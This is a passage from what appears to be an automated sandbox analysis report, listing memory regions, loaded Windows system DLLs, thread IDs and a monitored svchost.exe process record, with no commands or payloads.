start_va = 0x7ffc5f540000
end_va = 0x7ffc5f6c5fff
monitored = 0
entry_point = 0x7ffc5f58ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 995
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 996
start_va = 0x7ffc5e3e0000
end_va = 0x7ffc5e522fff
monitored = 0
entry_point = 0x7ffc5e408210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 997
start_va = 0x7ffc5e8f0000
end_va = 0x7ffc5e94afff
monitored = 0
entry_point = 0x7ffc5e9038b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 998
start_va = 0x7ffc5e810000
end_va = 0x7ffc5e84afff
monitored = 0
entry_point = 0x7ffc5e8112f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 999
start_va = 0x7ffc5e1e0000
end_va = 0x7ffc5e2a0fff
monitored = 0
entry_point = 0x7ffc5e200da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1000
start_va = 0x7ffc5a3a0000
end_va = 0x7ffc5a525fff
monitored = 0
entry_point = 0x7ffc5a3ed700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1001
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 1002
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1003
start_va = 0x8e0000
end_va = 0xa67fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008e0000"
filename = ""
Region:
id = 1004
start_va = 0xa70000
end_va = 0xbf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a70000"
filename = ""
Region:
id = 1005
start_va = 0xc00000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c00000"
filename = ""
Region:
id = 1006
start_va = 0x2000000
end_va = 0x214ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 1007
start_va = 0x600000
end_va = 0x63ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 1008
start_va = 0x7ffc5cc80000
end_va = 0x7ffc5e1defff
monitored = 0
entry_point = 0x7ffc5cde11f0
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1009
start_va = 0x7ffc5bec0000
end_va = 0x7ffc5bf02fff
monitored = 0
entry_point = 0x7ffc5bed4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1010
start_va = 0x7ffc5c3c0000
end_va = 0x7ffc5ca03fff
monitored = 0
entry_point = 0x7ffc5c5864b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 1014
start_va = 0x7ffc5be30000
end_va = 0x7ffc5be43fff
monitored = 0
entry_point = 0x7ffc5be352e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1015
start_va = 0x7ffc5be50000
end_va = 0x7ffc5be5efff
monitored = 0
entry_point = 0x7ffc5be53210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1016
start_va = 0x7ffc5be70000
end_va = 0x7ffc5bebafff
monitored = 0
entry_point = 0x7ffc5be735f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1017
start_va = 0x7ffc5cb50000
end_va = 0x7ffc5cc04fff
monitored = 0
entry_point = 0x7ffc5cb922e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 1018
start_va = 0x7ffc5e7b0000
end_va = 0x7ffc5e801fff
monitored = 0
entry_point = 0x7ffc5e7bf530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1019
start_va = 0x7ffc5ec20000
end_va = 0x7ffc5ecc6fff
monitored = 0
entry_point = 0x7ffc5ec358d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1020
start_va = 0x7ffc5a7b0000
end_va = 0x7ffc5a845fff
monitored = 0
entry_point = 0x7ffc5a7d5570
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1021
start_va = 0x2000000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 1022
start_va = 0x2140000
end_va = 0x214ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002140000"
filename = ""
Region:
id = 1023
start_va = 0x2150000
end_va = 0x2486fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1024
start_va = 0x2490000
end_va = 0x26adfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002490000"
filename = ""
Region:
id = 1025
start_va = 0x26b0000
end_va = 0x28c9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 1026
start_va = 0x2000000
end_va = 0x2111fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 1027
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 1028
start_va = 0x28d0000
end_va = 0x2ae2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 1029
start_va = 0x2af0000
end_va = 0x2bfafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002af0000"
filename = ""
Region:
id = 1030
start_va = 0x640000
end_va = 0x67ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 1031
start_va = 0x7ffc5eac0000
end_va = 0x7ffc5ec19fff
monitored = 0
entry_point = 0x7ffc5eb038e0
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1032
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1033
start_va = 0x7d0000
end_va = 0x88bfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007d0000"
filename = ""
Region:
id = 1034
start_va = 0x8d0000
end_va = 0x8dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 1035
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1036
start_va = 0x7ffc59dc0000
end_va = 0x7ffc59de1fff
monitored = 0
entry_point = 0x7ffc59dc1a40
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 1037
start_va = 0x7ffc5a2c0000
end_va = 0x7ffc5a2d2fff
monitored = 0
entry_point = 0x7ffc5a2c2760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1038
start_va = 0x7ffc5bc40000
end_va = 0x7ffc5bc95fff
monitored = 0
entry_point = 0x7ffc5bc50bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1039
start_va = 0x60000
end_va = 0x66fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 1040
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 1041
start_va = 0x80000
end_va = 0x80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 1042
start_va = 0x1d0000
end_va = 0x1d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 1043
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1044
start_va = 0x1f0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 1045
start_va = 0x680000
end_va = 0x680fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "conhostv2.dll.mui"
filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")
Region:
id = 1046
start_va = 0x690000
end_va = 0x691fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000690000"
filename = ""
Region:
id = 1047
start_va = 0x7ffc52e60000
end_va = 0x7ffc530d3fff
monitored = 0
entry_point = 0x7ffc52ed0400
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")
Region:
id = 1048
start_va = 0x6a0000
end_va = 0x6a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 1049
start_va = 0x6b0000
end_va = 0x6b1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006b0000"
filename = ""
Thread:
id = 14
os_tid = 0xec
Thread:
id = 15
os_tid = 0xbf0
Thread:
id = 16
os_tid = 0xdc8
Thread:
id = 17
os_tid = 0x1364
Process:
id = "4"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x75fd1000"
os_pid = "0x344"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "created_scheduled_job"
parent_id = "2"
os_parent_pid = "0x214"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a36c" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1074
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1075
start_va = 0x20000
end_va = 0x21fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1076
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1077
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1078
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1079
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1080
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1081
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1082
start_va = 0x1c0000
end_va = 0x1c6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1083
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 1084
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 1085
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 1086
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1087
start_va = 0x400000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1088
start_va = 0x500000
end_va = 0x500fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000500000"
filename = ""
Region:
id = 1089
start_va = 0x510000
end_va = 0x510fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000510000"
filename = ""
Region:
id = 1090
start_va = 0x520000
end_va = 0x521fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "dosvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui")
Region:
id = 1091
start_va = 0x530000
end_va = 0x536fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 1092
start_va = 0x540000
end_va = 0x540fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "usocore.dll.mui"
filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui")
Region:
id = 1093
start_va = 0x550000
end_va = 0x551fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 1094
start_va = 0x580000
end_va = 0x63ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000580000"
filename = ""
Region:
id = 1095
start_va = 0x640000
end_va = 0x640fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000640000"
filename = ""
Region:
id = 1096
start_va = 0x650000
end_va = 0x650fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000650000"
filename = ""
Region:
id = 1097
start_va = 0x660000
end_va = 0x6dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000660000"
filename = ""
Region:
id = 1098
start_va = 0x6f0000
end_va = 0x6f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006f0000"
filename = ""
Region:
id = 1099
start_va = 0x700000
end_va = 0x706fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 1100
start_va = 0x740000
end_va = 0x78efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000740000"
filename = ""
Region:
id = 1101
start_va = 0x790000
end_va = 0x790fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000790000"
filename = ""
Region:
id = 1102
start_va = 0x7a0000
end_va = 0x7a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007a0000"
filename = ""
Region:
id = 1103
start_va = 0x7c0000
end_va = 0x7c3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1104
start_va = 0x7d0000
end_va = 0x7d6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007d0000"
filename = ""
Region:
id = 1105
start_va = 0x7e0000
end_va = 0x7e3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1106
start_va = 0x800000
end_va = 0x8fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 1107
start_va = 0x900000
end_va = 0xa87fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000900000"
filename = ""
Region:
id = 1108
start_va = 0xa90000
end_va = 0xc10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a90000"
filename = ""
Region:
id = 1109
start_va = 0xc20000
end_va = 0x101afff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c20000"
filename = ""
Region:
id = 1110
start_va = 0x1020000
end_va = 0x109ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001020000"
filename = ""
Region:
id = 1111
start_va = 0x10a0000
end_va = 0x10a1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "activeds.dll.mui"
filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui")
Region:
id = 1112
start_va = 0x10b0000
end_va = 0x10b4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "winnlsres.dll"
filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll")
Region:
id = 1113
start_va = 0x10e0000
end_va = 0x10e6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010e0000"
filename = ""
Region:
id = 1114
start_va = 0x10f0000
end_va = 0x11effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010f0000"
filename = ""
Region:
id = 1115
start_va = 0x11f0000
end_va = 0x11f6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011f0000"
filename = ""
Region:
id = 1116
start_va = 0x1200000
end_va = 0x12fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001200000"
filename = ""
Region:
id = 1117
start_va = 0x1300000
end_va = 0x13fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001300000"
filename = ""
Region:
id = 1118
start_va = 0x1400000
end_va = 0x1736fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1119
start_va = 0x1740000
end_va = 0x183ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001740000"
filename = ""
Region:
id = 1120
start_va = 0x1840000
end_va = 0x193ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001840000"
filename = ""
Region:
id = 1121
start_va = 0x1940000
end_va = 0x19bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001940000"
filename = ""
Region:
id = 1122
start_va = 0x1a00000
end_va = 0x1afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a00000"
filename = ""
Region:
id = 1123
start_va = 0x1b00000
end_va = 0x1bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b00000"
filename = ""
Region:
id = 1124
start_va = 0x1c00000
end_va = 0x1cdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1125
start_va = 0x1d00000
end_va = 0x1dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 1126
start_va = 0x1e00000
end_va = 0x1efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e00000"
filename = ""
Region:
id = 1127
start_va = 0x1f00000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f00000"
filename = ""
Region:
id = 1128
start_va = 0x2000000
end_va = 0x20fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 1129
start_va = 0x2100000
end_va = 0x21fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002100000"
filename = ""
Region:
id = 1130
start_va = 0x2200000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 1131
start_va = 0x2300000
end_va = 0x23fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 1132
start_va = 0x2400000
end_va = 0x24fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002400000"
filename = ""
Region:
id = 1133
start_va = 0x2500000
end_va = 0x25fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 1134
start_va = 0x2600000
end_va = 0x26fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 1135
start_va = 0x2700000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 1136
start_va = 0x2800000
end_va = 0x28fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 1137
start_va = 0x2900000
end_va = 0x2944fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db")
Region:
id = 1138
start_va = 0x2950000
end_va = 0x29ddfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")
Region:
id = 1139
start_va = 0x29e0000
end_va = 0x2a5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029e0000"
filename = ""
Region:
id = 1140
start_va = 0x2ac0000
end_va = 0x2ac6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ac0000"
filename = ""
Region:
id = 1141
start_va = 0x2af0000
end_va = 0x2af6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002af0000"
filename = ""
Region:
id = 1142
start_va = 0x2b00000
end_va = 0x2bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 1143
start_va = 0x2c00000
end_va = 0x2c7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c00000"
filename = ""
Region:
id = 1144
start_va = 0x2c80000
end_va = 0x2cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c80000"
filename = ""
Region:
id = 1145
start_va = 0x2d00000
end_va = 0x2dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d00000"
filename = ""
Region:
id = 1146
start_va = 0x2e00000
end_va = 0x2efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e00000"
filename = ""
Region:
id = 1147
start_va = 0x2f00000
end_va = 0x2ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f00000"
filename = ""
Region:
id = 1148
start_va = 0x3000000
end_va = 0x30fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003000000"
filename = ""
Region:
id = 1149
start_va = 0x3100000
end_va = 0x31fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003100000"
filename = ""
Region:
id = 1150
start_va = 0x3300000
end_va = 0x337ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003300000"
filename = ""
Region:
id = 1151
start_va = 0x3380000
end_va = 0x347ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003380000"
filename = ""
Region:
id = 1152
start_va = 0x3480000
end_va = 0x34fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003480000"
filename = ""
Region:
id = 1153
start_va = 0x3560000
end_va = 0x3566fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003560000"
filename = ""
Region:
id = 1154
start_va = 0x3570000
end_va = 0x35effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003570000"
filename = ""
Region:
id = 1155
start_va = 0x3600000
end_va = 0x36fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003600000"
filename = ""
Region:
id = 1156
start_va = 0x3700000
end_va = 0x37fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003700000"
filename = ""
Region:
id = 1157
start_va = 0x3800000
end_va = 0x38fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003800000"
filename = ""
Region:
id = 1158
start_va = 0x3900000
end_va = 0x397ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003900000"
filename = ""
Region:
id = 1159
start_va = 0x3980000
end_va = 0x39fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003980000"
filename = ""
Region:
id = 1160
start_va = 0x3a00000
end_va = 0x3afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a00000"
filename = ""
Region:
id = 1161
start_va = 0x3b00000
end_va = 0x3bfffff
monitored = 1
entry_point = 0x0
region_type = private
